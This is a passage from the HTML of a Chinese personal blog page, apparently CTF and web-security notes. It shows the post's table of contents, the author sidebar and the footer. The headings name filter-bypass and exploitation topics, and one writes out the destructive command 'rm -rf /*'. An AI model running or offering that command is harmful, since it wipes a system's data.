href="#%E7%A7%BB%E4%BD%8D%E8%AE%A1%E7%AE%97%E7%9A%84%E4%B8%80%E4%B8%AA%E7%89%B9%E6%AE%8A%E5%80%BC"><span class="nav-number">6.</span> <span class="nav-text">移位计算的一个特殊值</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A0%E5%BA%93%E8%B7%91%E8%B7%AF-rm-rf"><span class="nav-number">7.</span> <span class="nav-text">删库跑路  rm -rf &#x2F;*</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BC%95%E5%8F%B7"><span class="nav-number">8.</span> <span class="nav-text">Linux系统中的反引号</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jsfuck"><span class="nav-number">9.</span> <span class="nav-text">jsfuck</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sha1%E7%A2%B0%E6%92%9E"><span class="nav-number">10.</span> <span class="nav-text">sha1碰撞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#127-0-0-1%E7%9A%84%E5%90%84%E7%A7%8D%E8%BF%9B%E5%88%B6%EF%BC%8C%E4%B8%80%E8%88%AC%E5%88%A9%E7%94%A8%E5%8D%81%E8%BF%9B%E5%88%B6%E7%BB%95%E8%BF%87"><span class="nav-number">11.</span> <span class="nav-text">127.0.0.1的各种进制，一般利用十进制绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ssit%E5%AE%98%E6%96%B9%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">12.</span> <span class="nav-text">ssit官方漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux%E8%83%BD%E6%89%93%E5%BC%80%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="nav-number">13.</span> <span class="nav-text">Linux能打开文件的命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%A4%E4%B8%AA-%E5%92%8C%E4%B8%89%E4%B8%AA-%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="nav-number">14.</span> <span class="nav-text">两个&#x3D;&#x3D;和三个&#x3D;&#x3D;&#x3D;的区别</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0day"><span class="nav-number">15.</span> <span class="nav-text">0day</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E8%AF%AD%E5%8F%A5%E4%B8%ADand%E5%92%8Cor%E7%9A%84%E4%BC%98%E5%85%88%E7%BA%A7"><span class="nav-number">16.</span> <span class="nav-text">sql语句中and和or的优先级</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%88%86%E5%B8%83%E5%BC%8F"><span class="nav-number">17.</span> <span class="nav-text">什么是分布式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFIIS"><span class="nav-number">18.</span> <span class="nav-text">什么是IIS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%A1%E9%81%93%E7%AC%A6"><span class="nav-number">19.</span> <span class="nav-text">管道符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exp%E3%80%81PoC%E3%80%81Webshell%E5%92%8Cpayload%E7%9A%84%E5%8C%BA%E5%88%86"><span class="nav-number">20.</span> <span class="nav-text">Exp、PoC、Webshell和payload的区分</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="tw0_one"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">tw0_one</p>
  <div class="site-description" itemprop="description">山河远阔，人间星河</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/tw0-one" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tw0-one" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:tw0_one@163.com" title="E-Mail → mailto:tw0_one@163.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://tw0-one.github.io/images/qq.png" title="QQ → https:&#x2F;&#x2F;tw0-one.github.io&#x2F;images&#x2F;qq.png" rel="noopener" target="_blank"><i class="fab fa-qq fa-fw"></i>QQ</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://tw0-one.github.io/images/wx.png" title="WeChat → https:&#x2F;&#x2F;tw0-one.github.io&#x2F;images&#x2F;wx.png" rel="noopener" target="_blank"><i class="fab fa-weixin fa-fw"></i>WeChat</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://1cec0la.github.io/" title="https:&#x2F;&#x2F;1cec0la.github.io&#x2F;" rel="noopener" target="_blank">1ceC0la</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Wed Jan 05 2022 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">tw0_one</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共13.2k字</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
